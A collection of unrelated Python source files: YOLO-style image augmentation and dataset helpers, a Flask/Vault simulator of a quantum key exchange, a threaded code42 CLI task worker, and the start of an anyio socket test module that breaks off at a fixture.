                img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
                r = np.random.beta(8.0, 8.0)  # mixup ratio, alpha=beta=8.0
                img = (img * r + img2 * (1 - r)).astype(np.uint8)
                labels = np.concatenate((labels, labels2), 0)

        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)

            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

            # Load labels
            labels = []
            x = self.labels[index]
            if x.size > 0:
                # Normalized xywh to pixel xyxy format
                labels = x.copy()
                labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]  # pad width
                labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]  # pad height
                labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
                labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]

        if self.augment:
            # Augment imagespace
            if not self.mosaic:
                img, labels = random_perspective(img, labels,
                                                 degrees=hyp['degrees'],
                                                 translate=hyp['translate'],
                                                 scale=hyp['scale'],
                                                 shear=hyp['shear'],
                                                 perspective=hyp['perspective'])

            # Augment colorspace
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

            # Apply cutouts
            # if random.random() < 0.9:
            #     labels = cutout(img, labels)

        nL = len(labels)  # number of labels
        if nL:
            labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])  # convert xyxy to xywh
            labels[:, [2, 4]] /= img.shape[0]  # normalized height 0-1
            labels[:, [1, 3]] /= img.shape[1]  # normalized width 0-1

        if self.augment:
            # flip up-down
            if random.random() < hyp['flipud']:
                img = np.flipud(img)
                if nL:
                    labels[:, 2] = 1 - labels[:, 2]

            # flip left-right
            if random.random() < hyp['fliplr']:
                img = np.fliplr(img)
                if nL:
                    labels[:, 1] = 1 - labels[:, 1]

        labels_out = torch.zeros((nL, 6))
        if nL:
            labels_out[:, 1:] = torch.from_numpy(labels)

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return torch.from_numpy(img), labels_out, self.img_files[index], shapes

    @staticmethod
    def collate_fn(batch):
        """Stack dataset items into batch tensors; column 0 of each label row receives its image index."""
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
    """Return (image, original_hw, resized_hw) for dataset item *index*, using the RAM cache when populated."""
    cached = self.imgs[index]
    if cached is not None:
        # Cached during __init__ (cache_images=True); hw values were stored alongside.
        return cached, self.img_hw0[index], self.img_hw[index]  # img, hw_original, hw_resized

    path = self.img_files[index]
    img = cv2.imread(path)  # BGR
    assert img is not None, 'Image Not Found ' + path
    h0, w0 = img.shape[:2]  # orig hw
    ratio = self.img_size / max(h0, w0)  # resize image to img_size
    if ratio != 1:  # always resize down, only resize up if training with augmentation
        interp = cv2.INTER_AREA if ratio < 1 and not self.augment else cv2.INTER_LINEAR
        img = cv2.resize(img, (int(w0 * ratio), int(h0 * ratio)), interpolation=interp)
    return img, (h0, w0), img.shape[:2]  # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
    """Randomly jitter hue/saturation/value of a BGR uint8 image in place using per-channel LUTs."""
    r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1  # random gains
    hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
    dtype = img.dtype  # uint8

    x = np.arange(0, 256, dtype=np.int16)
    lut_hue = ((x * r[0]) % 180).astype(dtype)  # OpenCV 8-bit hue range is 0-179, hence the modulo
    lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
    lut_val = np.clip(x * r[2], 0, 255).astype(dtype)

    img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
    cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)  # no return needed

    # Histogram equalization
    # if random.random() < 0.2:
    #     for i in range(3):
    #         img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
    """Build a 2s x 2s mosaic from item *index* plus 3 random images; returns (mosaic, pixel-space labels)."""
    # loads images in a mosaic
    labels4 = []
    s = self.img_size
    yc, xc = s, s  # mosaic center x, y
    indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)]  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            # NOTE(review): max(xc, w) as the source x2 looks suspicious (the other tiles use
            # min(w, x2a - x1a)); confirm against upstream before relying on the exact crop.
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        padw = x1a - x1b
        padh = y1a - y1b

        # Labels
        x = self.labels[index]
        labels = x.copy()
        if x.size > 0:  # Normalized xywh to pixel xyxy format
            labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
            labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
            labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
            labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
        labels4.append(labels)

    # Concat/clip labels
    if len(labels4):
        labels4 = np.concatenate(labels4, 0)
        # np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:])  # use with center crop
        np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:])  # use with random_affine

        # Replicate
        # img4, labels4 = replicate(img4, labels4)

    # Augment
    # img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)]  # center crop (WARNING, requires box pruning)
    img4, labels4 = random_perspective(img4, labels4,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img4, labels4
def replicate(img, labels):
    """Duplicate the smaller half of labelled boxes by pasting each at a random spot; returns (img, labels)."""
    h, w = img.shape[:2]
    boxes = labels[:, 1:].astype(int)
    x1, y1, x2, y2 = boxes.T
    sides = ((x2 - x1) + (y2 - y1)) / 2  # mean side length per box (pixels)
    for i in sides.argsort()[:round(sides.size * 0.5)]:  # smallest half first
        x1b, y1b, x2b, y2b = boxes[i]
        bh = y2b - y1b
        bw = x2b - x1b
        # Random paste offset inside the image (y drawn before x, matching the original).
        yc = int(random.uniform(0, h - bh))
        xc = int(random.uniform(0, w - bw))
        x1a, y1a, x2a, y2a = xc, yc, xc + bw, yc + bh
        img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # paste the box pixels
        labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
    return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
    """
    Resize *img* to fit *new_shape* while preserving aspect ratio, padding the remainder with *color*.
    Returns (image, (w_ratio, h_ratio), (dw, dh)) where dw/dh are the per-side paddings in pixels.
    """
    # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
    shape = img.shape[:2]  # current shape [height, width]
    if isinstance(new_shape, int):
        new_shape = (new_shape, new_shape)

    # Scale ratio (new / old)
    r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
    if not scaleup:  # only scale down, do not scale up (for better test mAP)
        r = min(r, 1.0)

    # Compute padding
    ratio = r, r  # width, height ratios
    new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
    dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]  # wh padding
    if auto:  # minimum rectangle
        dw, dh = np.mod(dw, 64), np.mod(dh, 64)  # wh padding
    elif scaleFill:  # stretch
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape[1], new_shape[0])
        ratio = new_shape[1] / shape[1], new_shape[0] / shape[0]  # width, height ratios

    dw /= 2  # divide padding into 2 sides
    dh /= 2

    if shape[::-1] != new_unpad:  # resize
        img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
    # The +/-0.1 rounding splits an odd pixel of padding between the two sides.
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # add border
    return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
    """
    Apply a random combined center/perspective/rotation-scale/shear/translation warp to *img*
    and transform *targets* ([cls, xyxy] rows) accordingly; boxes that degenerate are dropped.
    """
    # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
    # targets = [cls, xyxy]

    height = img.shape[0] + border[0] * 2  # shape(h,w,c)
    width = img.shape[1] + border[1] * 2

    # Center
    C = np.eye(3)
    C[0, 2] = -img.shape[1] / 2  # x translation (pixels)
    C[1, 2] = -img.shape[0] / 2  # y translation (pixels)

    # Perspective
    P = np.eye(3)
    P[2, 0] = random.uniform(-perspective, perspective)  # x perspective (about y)
    P[2, 1] = random.uniform(-perspective, perspective)  # y perspective (about x)

    # Rotation and Scale
    R = np.eye(3)
    a = random.uniform(-degrees, degrees)
    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations
    s = random.uniform(1 - scale, 1 + scale)
    # s = 2 ** random.uniform(-scale, scale)
    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)

    # Shear
    S = np.eye(3)
    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)
    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)

    # Translation
    T = np.eye(3)
    T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width  # x translation (pixels)
    T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height  # y translation (pixels)

    # Combined rotation matrix
    M = T @ S @ R @ P @ C  # order of operations (right to left) is IMPORTANT
    if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any():  # image changed
        if perspective:
            img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
        else:  # affine
            img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))

    # Visualize
    # import matplotlib.pyplot as plt
    # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
    # ax[0].imshow(img[:, :, ::-1])  # base
    # ax[1].imshow(img2[:, :, ::-1])  # warped

    # Transform label coordinates
    n = len(targets)
    if n:
        # warp points: all 4 corners of each box go through the same matrix
        xy = np.ones((n * 4, 3))
        xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2)  # x1y1, x2y2, x1y2, x2y1
        xy = xy @ M.T  # transform
        if perspective:
            xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8)  # rescale
        else:  # affine
            xy = xy[:, :2].reshape(n, 8)

        # create new boxes: axis-aligned hull of the 4 warped corners
        x = xy[:, [0, 2, 4, 6]]
        y = xy[:, [1, 3, 5, 7]]
        xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T

        # # apply angle-based reduction of bounding boxes
        # radians = a * math.pi / 180
        # reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
        # x = (xy[:, 2] + xy[:, 0]) / 2
        # y = (xy[:, 3] + xy[:, 1]) / 2
        # w = (xy[:, 2] - xy[:, 0]) * reduction
        # h = (xy[:, 3] - xy[:, 1]) * reduction
        # xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T

        # clip boxes
        xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
        xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)

        # filter candidates
        i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
        targets = targets[i]
        targets[:, 1:5] = xy[i]

    return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.2):  # box1(4,n), box2(4,n)
    """
    Boolean mask of augmented boxes worth keeping: both sides above wh_thr pixels,
    area not collapsed below area_thr of the original, and aspect ratio below ar_thr.
    """
    eps = 1e-16  # guards divisions against zero-sized boxes
    w1 = box1[2] - box1[0]
    h1 = box1[3] - box1[1]
    w2 = box2[2] - box2[0]
    h2 = box2[3] - box2[1]
    aspect = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps))
    area_ok = w2 * h2 / (w1 * h1 + eps) > area_thr
    return (w2 > wh_thr) & (h2 > wh_thr) & area_ok & (aspect < ar_thr)  # candidates
def cutout(image, labels):
    """
    Cutout augmentation (https://arxiv.org/abs/1708.04552): paint random rectangles
    over *image* in place and return the labels that are not mostly obscured.
    """
    h, w = image.shape[:2]

    def bbox_ioa(box1, box2):
        # Intersection of box1 with each row of box2, divided by box2's own area
        # (boxes are x1y1x2y2; box1 is length-4, box2 is nx4).
        box2 = box2.transpose()
        b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
        b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
        inter_w = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0)
        inter_h = (np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
        box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
        return inter_w * inter_h / box2_area

    # One mask per entry: a half-size mask, two quarter-size, four eighth-size, etc.
    scales = [0.5] + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
    for s in scales:
        mask_h = random.randint(1, int(h * s))
        mask_w = random.randint(1, int(w * s))

        # Mask rectangle, clipped to the image bounds.
        xmin = max(0, random.randint(0, w) - mask_w // 2)
        ymin = max(0, random.randint(0, h) - mask_h // 2)
        xmax = min(w, xmin + mask_w)
        ymax = min(h, ymin + mask_h)

        # Fill with a random mid-range color.
        image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]

        # Drop labels hidden >60% by a non-trivial mask.
        if len(labels) and s > 0.03:
            box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
            ioa = bbox_ioa(box, labels[:, 1:5])  # intersection over area
            labels = labels[ioa < 0.60]

    return labels
def reduce_img_size(path='path/images', img_size=1024):  # from utils.datasets import *; reduce_img_size()
    """Write down-scaled copies of all images under *path* to '<path>_reduced'.

    Images whose longest side exceeds *img_size* are resized with area
    interpolation so the longest side equals img_size; smaller images are
    written through unchanged.  The output folder is recreated from scratch
    by create_folder().
    """
    path_new = path + '_reduced'  # reduced images path
    create_folder(path_new)
    for f in tqdm(glob.glob('%s/*.*' % path)):
        try:
            img = cv2.imread(f)  # returns None on unreadable files; .shape below then raises
            h, w = img.shape[:2]
            r = img_size / max(h, w)  # size ratio
            if r < 1.0:
                img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA)  # _LINEAR fastest
            fnew = f.replace(path, path_new)  # .replace(Path(f).suffix, '.jpg')
            cv2.imwrite(fnew, img)
        except Exception as e:
            # was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit
            # and hid the reason for the failure
            print('WARNING: image failure %s: %s' % (f, e))
def recursive_dataset2bmp(dataset='path/dataset_bmp'):  # from utils.datasets import *; recursive_dataset2bmp()
    """Convert every image under *dataset* to .bmp in place (for faster training).

    Label .txt files are rewritten so extension references point at the .bmp
    names; original non-bmp images are deleted after conversion.
    """
    formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
    for a, b, files in os.walk(dataset):
        for file in tqdm(files, desc=a):
            p = a + '/' + file
            s = Path(file).suffix
            if s == '.txt':  # rewrite extension references inside label files
                with open(p, 'r') as f:
                    lines = f.read()
                for fmt in formats:  # renamed from 'f', which shadowed the file handle above
                    lines = lines.replace(fmt, '.bmp')
                with open(p, 'w') as f:
                    f.write(lines)
            elif s in formats:  # re-encode the image as bmp
                # replace only the trailing suffix; str.replace(s, '.bmp') could hit
                # an accidental earlier occurrence of the extension in the path
                cv2.imwrite(p[:-len(s)] + '.bmp', cv2.imread(p))
                if s != '.bmp':
                    os.remove(p)  # portable; os.system("rm '...'") was shell-dependent and quote-fragile
def imagelist2folder(path='path/images.txt'):  # from utils.datasets import *; imagelist2folder()
    """Copy every image listed in *path* (one path per line) into a folder.

    The destination folder is named after the list file with its '.txt'
    suffix stripped and is recreated from scratch by create_folder().
    """
    create_folder(path[:-4])
    with open(path, 'r') as f:
        for line in f.read().splitlines():
            # shutil.copy is portable and immune to shell quoting/injection,
            # unlike the previous os.system('cp "%s" %s') call
            shutil.copy(line, path[:-4])
            print(line)
def create_folder(path='./new'):
    """Ensure *path* exists as a brand-new, empty directory.

    Any pre-existing directory at *path* is removed first, so callers always
    start from a clean output folder.
    """
    try:
        shutil.rmtree(path)  # drop stale output from a previous run
    except FileNotFoundError:
        pass  # nothing to remove
    os.makedirs(path)  # make new output folder
|
fakeKE.py | from QKD import QKD
import mysql.connector
import hvac
from random import randint
import yaml
import time
from flask import Flask, request
import requests
import multiprocessing
from multiprocessing import Process
import logging
app = Flask(__name__)
server = None
serverPort = 4000
# utility function - timeout parameter is expressed in milliseconds
# convert epoch time to milliseconds
current_time = lambda: int(round(time.time() * 1000))
def run():
    """Attach a file log handler to the Flask app and serve on all interfaces."""
    handler = logging.FileHandler('bb84.log')
    handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    app.logger.addHandler(handler)
    app.logger.setLevel(logging.DEBUG)
    app.run(host='0.0.0.0', port=serverPort)
@app.route('/sendRegister', methods=['POST'])
def getQuantumKey():
    """Receive a key from a peer and park it in Vault until collected.

    Rejects the request with HTTP 400 if a previous exchange is still pending
    (a row already exists in the simulator table); otherwise stores the key
    under 'currentKey' in Vault and records the sender's IP in the table.
    """
    import ast  # local import: only this endpoint parses the peer's payload

    # close the config file deterministically (it was previously leaked)
    with open("/usr/src/app/src/configM.yaml", 'r') as pref_file:
        prefs = yaml.safe_load(pref_file)
    # SECURITY: request.data arrives from the network.  ast.literal_eval only
    # accepts Python literals (the repr() of the peer's bit list), unlike the
    # former eval(), which would execute arbitrary expressions.
    raw = request.data
    if isinstance(raw, bytes):
        raw = raw.decode()
    key = ast.literal_eval(raw)
    requestIP = request.remote_addr
    # retrieve information about this destination if any
    db = mysql.connector.connect(host=str(prefs['internal_db']['host']), port=str(prefs['internal_db']['port']), user=str(prefs['internal_db']['user']), passwd=str(prefs['internal_db']['passwd']), database=str(prefs['internal_db']['database']), autocommit=True)
    cursor = db.cursor()
    # table name comes from trusted local config, not from the request
    cursor.execute("SELECT * FROM " + str(prefs['simulator']['table']))
    result = cursor.fetchone()
    if result is not None:
        # previous key exchange is not completed yet, return an error
        return "Error", 400
    else:
        # a new key exchange can be started: save key in vault
        client = hvac.Client(url='http://' + prefs['vault']['host'] + ':' + str(prefs['vault']['port']))
        client.token = prefs['vault']['token']
        client.secrets.kv.v2.create_or_update_secret(path='currentKey', secret=dict(key=key),)
        # parameterized INSERT: requestIP is attacker-influenced and must never
        # be interpolated into the SQL string
        cursor.execute(
            "INSERT INTO " + str(prefs['simulator']['table']) +
            " (requestIP, complete, verified) VALUES (%s, True, True)",
            (requestIP,),
        )
        return "OK", 200
class fakeKE(QKD):
    """Fake key-exchange backend implementing the QKD interface.

    No quantum channel is involved: the sender generates random bits and
    POSTs them to the receiver's /sendRegister endpoint, which parks them in
    Vault and records the exchange in MySQL until the receiver collects the
    key via exchangeKey(source!=1).
    """

    def exchangeKey(self, key_length, destination='http://localhost:4000', timeout=0, source=1, eve=False):
        """Perform one key exchange and return (key, verified).

        source == 1 (sender): generate *key_length* random bits and POST them
        to *destination*; returns (None, False) if the POST fails, else
        (key, True).
        source != 1 (receiver): poll the local DB until the peer's key
        arrives or *timeout* milliseconds elapse, then fetch (and delete) the
        key from Vault; returns (key, verified), or (None, 4) on timeout.
        NOTE(review): the timeout path returns 4 rather than a boolean —
        callers apparently distinguish it; confirm before changing.
        NOTE(review): *eve* is unused here; presumably only meaningful for
        real QKD implementations — confirm.
        """
        pref_file = open("/usr/src/app/src/configM.yaml", 'r')
        prefs = yaml.safe_load(pref_file)
        app.logger.info('Starting key exchange. Desired key length: %s' % str(key_length))
        # sender source code
        if source == 1:
            # generate a new fake key
            key = []
            for i in range(key_length):
                key.append(randint(0,1))
            # forward the key to destination
            x = requests.post(destination + '/sendRegister?newKey=true&keyLen=' + str(key_length), data = repr(key))
            if x.status_code != 200:
                # send key failed
                return None, False
            # key exchange succeded
            return key, True
        # destination source code
        else:
            # check if a key has already been exchanged with desired destination
            destAddr = str(destination.split(':')[1][2:])
            db = mysql.connector.connect(host=str(prefs['internal_db']['host']), port=str(prefs['internal_db']['port']), user=str(prefs['internal_db']['user']), passwd=str(prefs['internal_db']['passwd']), database=str(prefs['internal_db']['database']), autocommit=True)
            cursor = db.cursor()
            cursor.execute("SELECT * FROM " + str(prefs['simulator']['table']))
            result = cursor.fetchone()
            if result is None:
                # key has not been received yet, wait until the key is received or timeout elapses
                # (busy-polls the table; timeout is in milliseconds)
                start_time = current_time()
                while result is None:
                    cursor.execute("SELECT * FROM " + str(prefs['simulator']['table']))
                    result = cursor.fetchone()
                    if current_time() > start_time + timeout:
                        # timeout elapsed - clean requests list
                        cursor.execute("DELETE FROM " + str(prefs['simulator']['table']))
                        return None, 4
            # now key exchange is complete
            verified = result[3]
            # key is saved in vault
            client = hvac.Client(url='http://' + prefs['vault']['host'] + ':' + str(prefs['vault']['port']))
            client.token = prefs['vault']['token']
            response = client.secrets.kv.read_secret_version(path='currentKey')
            key = response['data']['data']['key']
            # delete key once returned
            client.secrets.kv.delete_metadata_and_all_versions('currentKey')
            # once key has been exchange, delete its data from this module
            # NOTE(review): the table is locked for WRITE but never explicitly
            # unlocked; presumably released when the connection closes — confirm.
            cursor.execute("LOCK TABLES " + str(prefs['simulator']['table']) + " WRITE")
            cursor.execute("DELETE FROM " + str(prefs['simulator']['table']))
            return key, verified

    def begin(self, port = 4000):
        """Start the receiver-side Flask server in a separate process on *port*."""
        global server
        global serverPort
        serverPort = port
        # configure logger
        # file logging
        fh = logging.FileHandler('bb84.log')
        formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
        fh.setFormatter(formatter)
        app.logger.addHandler(fh)
        app.logger.setLevel(logging.DEBUG)
        # start server
        app.logger.info('Starting server')
        server = Process(target=run)
        server.start()

    def end(self):
        """Terminate the background server process and wait for it to exit."""
        app.logger.info('Killing threads')
        server.terminate()
        server.join()
        app.logger.info('Correctly quit application')
|
worker.py | import queue
from threading import Lock
from threading import Thread
from time import sleep
from py42.exceptions import Py42ForbiddenError
from py42.exceptions import Py42HTTPError
from code42cli.errors import Code42CLIError
from code42cli.logger import get_main_cli_logger
def create_worker_stats(total):
    """Factory for a WorkerStats tracking *total* expected tasks."""
    stats = WorkerStats(total)
    return stats
class WorkerStats:
    """Thread-safe counters and results for tasks run by a Worker.

    The counters, locks and result list were previously class-level
    attributes, which made `_results` (and the locks) shared across every
    WorkerStats instance — `add_result` on one instance polluted all others.
    They are now created per instance in __init__.
    """

    def __init__(self, total):
        self.total = total  # number of tasks expected to run
        self._total_processed = 0
        self._total_errors = 0
        self._results = []
        self.__total_processed_lock = Lock()
        self.__total_errors_lock = Lock()
        self.__results_lock = Lock()

    @property
    def total_processed(self):
        """The total number of tasks executed."""
        return self._total_processed

    @property
    def total_errors(self):
        """The amount of errors that occurred."""
        return self._total_errors

    @property
    def total_successes(self):
        """Processed minus errors, floored at zero."""
        val = self._total_processed - self._total_errors
        return val if val >= 0 else 0

    @property
    def results(self):
        """Values returned by successfully executed tasks."""
        return self._results

    def __str__(self):
        return f"{self.total_successes} succeeded, {self._total_errors} failed out of {self.total}"

    def increment_total_processed(self):
        """+1 to self.total_processed"""
        with self.__total_processed_lock:
            self._total_processed += 1

    def increment_total_errors(self):
        """+1 to self.total_errors"""
        with self.__total_errors_lock:
            self._total_errors += 1

    def add_result(self, result):
        """Append a task result to the list."""
        with self.__results_lock:
            self._results.append(result)

    def reset_results(self):
        """Discard all collected results."""
        with self.__results_lock:
            self._results = []
class Worker:
    """Runs submitted tasks asynchronously on a lazily-started pool of daemon threads."""

    def __init__(self, thread_count, expected_total, bar=None, stats=None):
        # bar: optional progress bar with an update(n) method; stats: optional
        # pre-built WorkerStats (a fresh one is created from expected_total otherwise)
        self._queue = queue.Queue()
        self._thread_count = thread_count
        self._bar = bar
        self._stats = stats or WorkerStats(expected_total)
        self._tasks = 0  # number of tasks submitted so far (see wait())
        self.__started = False
        self.__start_lock = Lock()
        self._logger = get_main_cli_logger()

    def do_async(self, func, *args, **kwargs):
        """Execute the given func asynchronously given *args and **kwargs.

        Args:
            func (callable): The function to execute asynchronously.
            *args (iter): Positional args to pass to the function.
            **kwargs (dict): Key-value args to pass to the function.
        """
        # double-checked start: only the first caller spawns the worker threads
        if not self.__started:
            with self.__start_lock:
                if not self.__started:
                    self.__start()
                    self.__started = True
        self._queue.put({"func": func, "args": args, "kwargs": kwargs})
        self._tasks += 1

    @property
    def stats(self):
        """Stats about the tasks that have been executed, such as the total errors that occurred.
        """
        return self._stats

    def wait(self):
        """Wait for the tasks in the queue to complete. This should usually be called before
        program termination."""
        # polls the processed counter rather than joining the queue, so tasks
        # submitted after wait() starts are still counted
        while self._stats.total_processed < self._tasks:
            sleep(0.5)

    def _process_queue(self):
        # Thread body: consume tasks forever, recording results and errors.
        while True:
            try:
                task = self._queue.get()
                func = task["func"]
                args = task["args"]
                kwargs = task["kwargs"]
                self._stats.add_result(func(*args, **kwargs))
            except Code42CLIError as err:
                self._increment_total_errors()
                self._logger.log_error(err)
            except Py42ForbiddenError as err:
                self._increment_total_errors()
                self._logger.log_verbose_error(http_request=err.response.request)
                self._logger.log_error(
                    "You do not have the necessary permissions to perform this task. "
                    "Try using or creating a different profile."
                )
            except Py42HTTPError as err:
                self._increment_total_errors()
                self._logger.log_verbose_error(http_request=err.response.request)
            except Exception:
                # unknown failure: counted and logged verbosely, never crashes the pool
                self._increment_total_errors()
                self._logger.log_verbose_error()
            finally:
                self._stats.increment_total_processed()
                if self._bar:
                    self._bar.update(1)
                self._queue.task_done()

    def __start(self):
        # daemon threads die with the main thread, so wait() must be used to drain
        for _ in range(0, self._thread_count):
            t = Thread(target=self._process_queue)
            t.daemon = True
            t.start()

    def _increment_total_errors(self):
        self._stats.increment_total_errors()
|
test_sockets.py | import array
import gc
import io
import os
import platform
import socket
import sys
import threading
import time
from contextlib import suppress
from pathlib import Path
from socket import AddressFamily
from ssl import SSLContext, SSLError
from threading import Thread
from typing import (
Any,
Iterable,
Iterator,
List,
NoReturn,
Tuple,
Type,
TypeVar,
Union,
cast,
)
import pytest
from _pytest.fixtures import SubRequest
from _pytest.logging import LogCaptureFixture
from _pytest.monkeypatch import MonkeyPatch
from _pytest.tmpdir import TempPathFactory
from anyio import (
BrokenResourceError,
BusyResourceError,
ClosedResourceError,
Event,
ExceptionGroup,
TypedAttributeLookupError,
connect_tcp,
connect_unix,
create_connected_udp_socket,
create_task_group,
create_tcp_listener,
create_udp_socket,
create_unix_listener,
fail_after,
getaddrinfo,
getnameinfo,
move_on_after,
sleep,
wait_all_tasks_blocked,
)
from anyio.abc import (
IPSockAddrType,
Listener,
SocketAttribute,
SocketListener,
SocketStream,
)
from anyio.streams.stapled import MultiListener
if sys.version_info >= (3, 8):
from typing import Literal
else:
from typing_extensions import Literal
AnyIPAddressFamily = Literal[
AddressFamily.AF_UNSPEC, AddressFamily.AF_INET, AddressFamily.AF_INET6
]
pytestmark = pytest.mark.anyio
# If a socket can bind to ::1, the current environment has IPv6 properly configured
has_ipv6 = False
if socket.has_ipv6:
    try:
        probe = socket.socket(AddressFamily.AF_INET6)
        try:
            probe.bind(("::1", 0))
        finally:
            probe.close()
        del probe
    except OSError:
        pass  # IPv6 stack present but loopback bind failed
    else:
        has_ipv6 = True
@pytest.fixture
def fake_localhost_dns(monkeypatch: MonkeyPatch) -> None:
